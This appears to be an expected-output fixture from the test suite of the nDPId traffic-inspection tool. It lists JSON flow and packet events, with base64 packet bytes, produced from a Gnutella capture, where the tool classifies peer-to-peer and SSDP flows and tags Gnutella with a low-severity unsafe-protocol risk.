-00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":234,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":65063,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":65063,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0DWpAAIAG8s4KAAIPVXWZB8Qlw9oAc\/5TAAAAAIAC+vDyzAAAAgQFtAEDAwgBAQQC"} +00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":63233,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":63233,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAoYAAEAGCJAvkzQVCgACD494xBcAY5wBOEHDT2AS\/\/882gAAAgQFtA=="} +00436{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":178,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":63234,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":63234,"pkt":"UlQAEjUCCAAn5uVZCABFAAAouwVAAIAG0BMKAAIPL5M0FcQXj3g4QcNPAGOcAlAQ+vBZpgAA"} +00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":179,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":63250,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":63250,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAocAAEAGiwHa+gY7CgACDzEMxBQAZJYBrKXgdGAS\/\/+SMQAAAgQFtA=="} +00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":180,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":63250,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":63250,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoLR5AAIAG4G0KAAIP2voGO8QUMQyspeB0AGSWAlAQ+vCu\/QAA"} +00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":181,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":63001,"flow_last_seen":63261,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":598,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":63261,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"47.147.52.21","src_port":50199,"dst_port":36728,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":182,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":63000,"flow_last_seen":63261,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":598,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":63261,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"218.250.6.59","src_port":50196,"dst_port":12556,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":185,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":63297,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":63297,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAooAAEAG5kR2qA9HCgACDw9bxBUAZZABIZ4f2mAS\/\/9gyQAAAgQFtA=="} +00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":186,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":63297,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":63297,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoTFBAAIAGHIIKAAIPdqgPR8QVD1shnh\/aAGWQAlAQ+vB9lQAA"} +00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":187,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":63001,"flow_last_seen":63309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":63309,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"118.168.15.71","src_port":50197,"dst_port":3931,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":203,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":64030,"flow_last_seen":64030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":64030,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"61.238.173.128","src_port":50202,"dst_port":57648,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":203,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":64030,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":64030,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0GZhAAIAG6a4KAAIPPe6tgMQa4TAr3W0hAAAAAIAC+vA+WAAAAgQFtAEDAwgBAQQC"} +00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":204,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":64031,"flow_last_seen":64031,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":64031,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"61.222.160.99","src_port":50203,"dst_port":18994,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":204,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":64031,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":64031,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0cDRAAIAGoD8KAAIPPd6gY8QbSjIrqiNHAAAAAIAC+vAskAAAAgQFtAEDAwgBAQQC"} +00553{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":205,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":64032,"flow_last_seen":64032,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":64032,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"124.218.26.16","src_port":50204,"dst_port":9728,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":205,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":64032,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":64032,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0FX9AAIAGQkwKAAIPfNoaEMQcJgCBbg3uAAAAAIAC+vBXrQAAAgQFtAEDAwgBAQQC"} +00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":206,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":64032,"flow_last_seen":64032,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":64032,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"114.46.139.171","src_port":50205,"dst_port":52120,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":206,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":64032,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":64032,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0XTBAAIAGk6sKAAIPci6Lq8Qdy5gelScRAAAAAIAC+vCU2gAAAgQFtAEDAwgBAQQC"} +00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":207,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":64032,"flow_last_seen":64032,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":64032,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"175.181.156.244","src_port":50206,"dst_port":8255,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":207,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":64032,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":64032,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0yBFAAIAG2fkKAAIPr7Wc9MQeID9tpdrVAAAAAIAC+vDujQAAAgQFtAEDAwgBAQQC"} +00553{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":208,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":64033,"flow_last_seen":64033,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":64033,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"90.78.171.204","src_port":50207,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":208,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":64033,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":64033,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0kpNAAIAGVgcKAAIPWk6rzMQfGMqXoNUlAAAAAIAC+vAYRgAAAgQFtAEDAwgBAQQC"} +00436{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":209,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":64213,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":64213,"pkt":"CAAn5uVZUlQAEjUCCABFAAAoApQAAP8Gwb497q2ACgACD+EwxBoAAAAAK91tIlAUAAB6CAAA"} +00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":210,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":64275,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":64275,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsApUAAEAGjec93qBjCgACD0oyxBsAZ4QBK6ojSGAS\/\/\/MHQAAAgQFtA=="} +00436{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":211,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":64276,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":64276,"pkt":"UlQAEjUCCAAn5uVZCABFAAAocDVAAIAGoEoKAAIPPd6gY8QbSjIrqiNIAGeEAlAQ+vDo6QAA"} +00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":212,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":64031,"flow_last_seen":64276,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":64276,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"61.222.160.99","src_port":50203,"dst_port":18994,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":64291,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":64291,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsApcAAEAGH32vtZz0CgACDyA\/xB4AaH4BbaXa1mAS\/\/+UGgAAAgQFtA=="} +00436{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":215,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":64291,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":64291,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoyBJAAIAG2gQKAAIPr7Wc9MQeID9tpdrWAGh+AlAQ+vCw5gAA"} +00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":216,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":64032,"flow_last_seen":64291,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":64291,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"175.181.156.244","src_port":50206,"dst_port":8255,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":227,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":64717,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":64717,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0GZlAAIAG6a0KAAIPPe6tgMQa4TAr3W0hAAAAAIAC+vA+WAAAAgQFtAEDAwgBAQQC"} +00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":229,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":65061,"flow_last_seen":65061,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":65061,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"119.237.116.22","src_port":50208,"dst_port":8683,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":229,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":65061,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":65061,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0q8tAAIAGVuYKAAIPd+10FsQgIevuSsSrAAAAAIAC+vDjCgAAAgQFtAEDAwgBAQQC"} +00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":230,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":65061,"flow_last_seen":65061,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":65061,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.252.206.254","src_port":50209,"dst_port":49587,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":230,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":65061,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":65061,"pkt":"UlQAEjUCCAAn5uVZCABFAAA02YBAAIAG1DkKAAIPcfzO\/sQhwbNg4z+5AAAAAIAC+vAApAAAAgQFtAEDAwgBAQQC"} +00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":231,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":65062,"flow_last_seen":65062,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":65062,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.234.18.166","src_port":50210,"dst_port":61404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":231,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":65062,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":65062,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0pW5AAIAGEbcKAAIPJOoSpsQi79zHbZnNAAAAAIAC+vAbRgAAAgQFtAEDAwgBAQQC"} +00553{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":232,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":65062,"flow_last_seen":65062,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":65062,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"14.199.10.60","src_port":50211,"dst_port":23458,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":232,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":65062,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":65062,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0SFBAAIAGjWIKAAIPDscKPMQjW6L9nzYkAAAAAIAC+vD7gwAAAgQFtAEDAwgBAQQC"} +00552{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":233,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":65062,"flow_last_seen":65062,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":65062,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"95.17.124.40","src_port":50212,"dst_port":6776,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":233,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":65062,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":65062,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0NVpAAIAG3iEKAAIPXxF8KMQkGnhkTfi6AAAAAIAC+vBRMgAAAgQFtAEDAwgBAQQC"} +00553{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":234,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":65063,"flow_last_seen":65063,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":65063,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"85.117.153.7","src_port":50213,"dst_port":50138,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":234,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":65063,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":65063,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0DWpAAIAG8s4KAAIPVXWZB8Qlw9oAc\/5TAAAAAIAC+vDyzAAAAgQFtAEDAwgBAQQC"} 00562{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":235,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":65065,"flow_last_seen":65065,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":182,"midstream":0,"thread_ts_msec":65065,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":57623,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":235,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":65065,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":224,"pkt_l4_len":190,"thread_ts_msec":65065,"pkt":"AQBef\/\/6CAAn5uVZCABFAADS4KkAAAER3GgKAAIP7\/\/\/+uEXB2wAvizBTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClVTRVItQUdFTlQ6IGd0ay1nbnV0ZWxsYS8xLjIuMiAoMjAyMi0wMi0yNSkNCk1BTjogInNzZHA6ZGlzY292ZXIiDQpTVDogdXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToyDQpNWDogMw0KDQo="} 00620{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":235,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":65065,"flow_last_seen":65065,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":182,"midstream":0,"thread_ts_msec":65065,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":57623,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":236,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":2,"flow_last_seen":65065,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":224,"pkt_l4_len":190,"thread_ts_msec":65065,"pkt":"AQBef\/\/6CAAn5uVZCABFAADS4KoAAAER3GcKAAIP7\/\/\/+uEXB2wAvi3BTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClVTRVItQUdFTlQ6IGd0ay1nbnV0ZWxsYS8xLjIuMiAoMjAyMi0wMi0yNSkNCk1BTjogInNzZHA6ZGlzY292ZXIiDQpTVDogdXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNWDogMw0KDQo="} 